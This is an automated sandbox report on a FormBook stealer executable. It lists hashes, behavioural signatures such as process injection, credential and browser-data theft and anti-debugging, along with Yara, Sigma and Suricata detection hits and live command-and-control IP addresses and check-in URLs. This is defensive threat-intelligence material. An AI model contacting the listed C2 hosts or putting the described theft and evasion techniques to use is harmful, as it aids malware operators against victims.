Edit tour

Windows Analysis Report
KcSzB2IpP5.exe

Overview

General Information

Sample name:	KcSzB2IpP5.exe renamed because original name is a hash value
Original sample name:	2d8921f5b874d74b06b9375f19d0f030a350a9edf7c56e89b21bd301b9c4ed74.exe
Analysis ID:	1587813
MD5:	87fc5e4dd52d2188da6023bc6a6b8ebb
SHA1:	16bba3e41ddc71f342e8bae23abe8fe263bededa
SHA256:	2d8921f5b874d74b06b9375f19d0f030a350a9edf7c56e89b21bd301b9c4ed74
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses shutdown.exe to shutdown or reboot the system

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

KcSzB2IpP5.exe (PID: 7876 cmdline: "C:\Users\user\Desktop\KcSzB2IpP5.exe" MD5: 87FC5E4DD52D2188DA6023BC6A6B8EBB)

svchost.exe (PID: 7992 cmdline: "C:\Users\user\Desktop\KcSzB2IpP5.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

krQctklhjIp.exe (PID: 6264 cmdline: "C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

shutdown.exe (PID: 8056 cmdline: "C:\Windows\SysWOW64\shutdown.exe" MD5: FCDE5AF99B82AE6137FB90C7571D40C3)

krQctklhjIp.exe (PID: 2404 cmdline: "C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6252 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1482212976.0000000000EA0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1481529737.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3783203591.00000000028C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3783026458.0000000002870000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3777177232.0000000002400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1483094484.0000000003800000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3783040936.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\KcSzB2IpP5.exe", CommandLine: "C:\Users\user\Desktop\KcSzB2IpP5.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\KcSzB2IpP5.exe", ParentImage: C:\Users\user\Desktop\KcSzB2IpP5.exe, ParentProcessId: 7876, ParentProcessName: KcSzB2IpP5.exe, ProcessCommandLine: "C:\Users\user\Desktop\KcSzB2IpP5.exe", ProcessId: 7992, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\KcSzB2IpP5.exe", CommandLine: "C:\Users\user\Desktop\KcSzB2IpP5.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\KcSzB2IpP5.exe", ParentImage: C:\Users\user\Desktop\KcSzB2IpP5.exe, ParentProcessId: 7876, ParentProcessName: KcSzB2IpP5.exe, ProcessCommandLine: "C:\Users\user\Desktop\KcSzB2IpP5.exe", ProcessId: 7992, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:12:38.616993+0100	2855465	1	A Network Trojan was detected	192.168.2.10	50025	3.33.130.190	80	TCP
2025-01-10T18:13:15.603180+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49896	3.33.130.190	80	TCP
2025-01-10T18:13:47.140360+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49980	13.248.169.48	80	TCP
2025-01-10T18:14:01.553375+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49984	47.83.1.90	80	TCP
2025-01-10T18:14:15.196530+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49988	103.106.67.112	80	TCP
2025-01-10T18:14:37.804648+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49992	103.23.149.28	80	TCP
2025-01-10T18:14:59.234035+0100	2855465	1	A Network Trojan was detected	192.168.2.10	49996	162.0.236.169	80	TCP
2025-01-10T18:15:17.407134+0100	2855465	1	A Network Trojan was detected	192.168.2.10	50000	13.248.169.48	80	TCP
2025-01-10T18:15:30.618982+0100	2855465	1	A Network Trojan was detected	192.168.2.10	50004	13.248.169.48	80	TCP
2025-01-10T18:15:44.508368+0100	2855465	1	A Network Trojan was detected	192.168.2.10	50008	136.243.64.147	80	TCP
2025-01-10T18:15:58.015129+0100	2855465	1	A Network Trojan was detected	192.168.2.10	50012	85.159.66.93	80	TCP
2025-01-10T18:16:11.436930+0100	2855465	1	A Network Trojan was detected	192.168.2.10	50016	85.159.66.93	80	TCP
2025-01-10T18:16:25.313449+0100	2855465	1	A Network Trojan was detected	192.168.2.10	50020	13.228.81.39	80	TCP
2025-01-10T18:16:38.676743+0100	2855465	1	A Network Trojan was detected	192.168.2.10	50024	188.114.96.3	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T18:13:40.538444+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49977	13.248.169.48	80	TCP
2025-01-10T18:13:42.045528+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49978	13.248.169.48	80	TCP
2025-01-10T18:13:44.582945+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49979	13.248.169.48	80	TCP
2025-01-10T18:13:53.694777+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49981	47.83.1.90	80	TCP
2025-01-10T18:13:56.241584+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49982	47.83.1.90	80	TCP
2025-01-10T18:13:58.788556+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49983	47.83.1.90	80	TCP
2025-01-10T18:14:07.448116+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49985	103.106.67.112	80	TCP
2025-01-10T18:14:10.100815+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49986	103.106.67.112	80	TCP
2025-01-10T18:14:12.573634+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49987	103.106.67.112	80	TCP
2025-01-10T18:14:29.880052+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49989	103.23.149.28	80	TCP
2025-01-10T18:14:32.491712+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49990	103.23.149.28	80	TCP
2025-01-10T18:14:35.226045+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49991	103.23.149.28	80	TCP
2025-01-10T18:14:51.588067+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49993	162.0.236.169	80	TCP
2025-01-10T18:14:54.184545+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49994	162.0.236.169	80	TCP
2025-01-10T18:14:56.802464+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49995	162.0.236.169	80	TCP
2025-01-10T18:15:04.780218+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49997	13.248.169.48	80	TCP
2025-01-10T18:15:07.313900+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49998	13.248.169.48	80	TCP
2025-01-10T18:15:09.874067+0100	2855464	1	A Network Trojan was detected	192.168.2.10	49999	13.248.169.48	80	TCP
2025-01-10T18:15:22.967562+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50001	13.248.169.48	80	TCP
2025-01-10T18:15:26.585393+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50002	13.248.169.48	80	TCP
2025-01-10T18:15:28.098403+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50003	13.248.169.48	80	TCP
2025-01-10T18:15:36.868602+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50005	136.243.64.147	80	TCP
2025-01-10T18:15:39.408020+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50006	136.243.64.147	80	TCP
2025-01-10T18:15:41.952594+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50007	136.243.64.147	80	TCP
2025-01-10T18:15:51.183103+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50009	85.159.66.93	80	TCP
2025-01-10T18:15:53.726040+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50010	85.159.66.93	80	TCP
2025-01-10T18:15:56.285894+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50011	85.159.66.93	80	TCP
2025-01-10T18:16:04.554240+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50013	85.159.66.93	80	TCP
2025-01-10T18:16:07.101183+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50014	85.159.66.93	80	TCP
2025-01-10T18:16:09.648013+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50015	85.159.66.93	80	TCP
2025-01-10T18:16:17.529702+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50017	13.228.81.39	80	TCP
2025-01-10T18:16:20.233716+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50018	13.228.81.39	80	TCP
2025-01-10T18:16:22.746425+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50019	13.228.81.39	80	TCP
2025-01-10T18:16:30.975998+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50021	188.114.96.3	80	TCP
2025-01-10T18:16:33.510239+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50022	188.114.96.3	80	TCP
2025-01-10T18:16:36.091341+0100	2855464	1	A Network Trojan was detected	192.168.2.10	50023	188.114.96.3	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.ripbgs.info/mheu/	Avira URL Cloud: Label: malware
Source: http://www.champs-cloud.systems/kt5b/?SDC=7sHsF0emfu3XBQ/jtFc60bzIUziWjTzDb0qmDF0qYFonYHCCAy09ZYE2TtsqBj+MZwW/uNpm4bfZrR+4SyFJtzDsidCuj5jdbNH0Ax+BPwx+K6LGFw==&mH=CpePy0P	Avira URL Cloud: Label: malware
Source: http://www.ripbgs.info/mheu/?SDC=9Pe/ezeaWCrzUAPBTcNIGLUigJjsMNJlR4gH1LxCPe/+YeL0Jf302cRtfT27tJhwI3isQtUK9KovoI0NPjbFDyYPKZnOU02C1XybnvkdM/orYwcMtw==&mH=CpePy0P	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: KcSzB2IpP5.exe	Virustotal: Detection: 66%			Perma Link
Source: KcSzB2IpP5.exe	ReversingLabs: Detection: 81%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1482212976.0000000000EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1481529737.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3783203591.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3783026458.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3777177232.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1483094484.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3783040936.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: KcSzB2IpP5.exe

Joe Sandbox ML: detected

Source: KcSzB2IpP5.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: krQctklhjIp.exe, 00000003.00000002.3777063791.000000000029E000.00000002.00000001.01000000.00000004.sdmp, krQctklhjIp.exe, 00000006.00000000.1558533328.000000000029E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: KcSzB2IpP5.exe, 00000000.00000003.1329934846.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, KcSzB2IpP5.exe, 00000000.00000003.1330634006.0000000003950000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1384032582.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1482401969.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1482401969.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1386344161.0000000003000000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3783411551.0000000002AD0000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000004.00000003.1490351264.0000000002929000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000003.1481873180.0000000002774000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3783411551.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: shutdown.pdbGCTL source: svchost.exe, 00000002.00000002.1481867263.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1450655610.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, krQctklhjIp.exe, 00000003.00000002.3782371434.0000000001038000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: KcSzB2IpP5.exe, 00000000.00000003.1329934846.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, KcSzB2IpP5.exe, 00000000.00000003.1330634006.0000000003950000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1384032582.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1482401969.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1482401969.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1386344161.0000000003000000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, shutdown.exe, 00000004.00000002.3783411551.0000000002AD0000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000004.00000003.1490351264.0000000002929000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000003.1481873180.0000000002774000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3783411551.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: shutdown.pdb source: svchost.exe, 00000002.00000002.1481867263.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1450655610.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, krQctklhjIp.exe, 00000003.00000002.3782371434.0000000001038000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: shutdown.exe, 00000004.00000002.3781063208.000000000263D000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3784032812.00000000030FC000.00000004.10000000.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3783560766.000000000308C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1787540796.000000000110C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: shutdown.exe, 00000004.00000002.3781063208.000000000263D000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000004.00000002.3784032812.00000000030FC000.00000004.10000000.00040000.00000000.sdmp, krQctklhjIp.exe, 00000006.00000002.3783560766.000000000308C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1787540796.000000000110C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004CDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004CDBBE
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_0049C2A2 FindFirstFileExW,	0_2_0049C2A2
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D68EE FindFirstFileW,FindClose,	0_2_004D68EE
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_004D698F
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004CD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004CD076
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004CD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004CD3A9
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_004D9642
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_004D979D
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_004D9B2B
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_004D5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_004D5C97
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4_2_0241C4B0 FindFirstFileW,FindNextFileW,FindClose,	4_2_0241C4B0

Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4x nop then xor eax, eax	4_2_02409F30
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4x nop then pop edi	4_2_0240E066
Source: C:\Windows\SysWOW64\shutdown.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_029C04F8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49896 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50000 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49981 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49977 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49992 -> 103.23.149.28:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50003 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50004 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49978 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50013 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49987 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49983 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49989 -> 103.23.149.28:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50006 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50005 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50021 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50014 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50008 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49993 -> 162.0.236.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50009 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50023 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49984 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49994 -> 162.0.236.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50018 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49988 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49998 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50007 -> 136.243.64.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50015 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49995 -> 162.0.236.169:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50016 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50020 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49996 -> 162.0.236.169:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49999 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49991 -> 103.23.149.28:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50011 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49985 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50022 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49980 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50001 -> 13.248.169.48:80
